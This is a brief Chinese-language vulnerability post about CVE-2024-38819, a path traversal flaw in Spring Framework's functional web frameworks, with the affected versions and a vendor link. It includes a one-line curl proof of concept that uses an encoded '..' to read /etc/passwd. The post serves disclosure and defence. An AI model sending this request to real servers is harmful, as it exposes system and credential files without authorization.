CVE-2024-38819｜Spring Framework路径遍历漏洞（POC）

0x00 前言

Spring是Java EE编程领域的一个轻量级开源框架。

Spring 框架的核心特性是可以用于开发任何 Java 应用程序，但是在 Java EE 平台上构建 web 应用程序是需要扩展的。

Spring 框架的目标是使 J2EE 开发变得更容易使用，通过启用基于 POJO 的编程模型来促进良好的编程实践。

0x01 漏洞描述

通过功能型Web框架WebMvc.fn或WebFlux.fn提供静态资源的应用程序容易受到路径遍历攻击。攻击者可以构造恶意的HTTP请求，并获取运行Spring应用程序的进程也可访问的文件系统上的任何文件。

0x02 CVE编号

CVE-2024-38819

0x03 影响版本

Spring Framework 5.3.0 - 5.3.40

Spring Framework 6.0.0 - 6.0.24

Spring Framework 6.1.0 - 6.1.13

以及不受支持的旧版本。

0x04 漏洞详情

POC：

curl   http://x.x.x.x/static/link/%2e%2e/etc/passwd

0x05 参考链接

https://spring.io/security/cve-2024-38819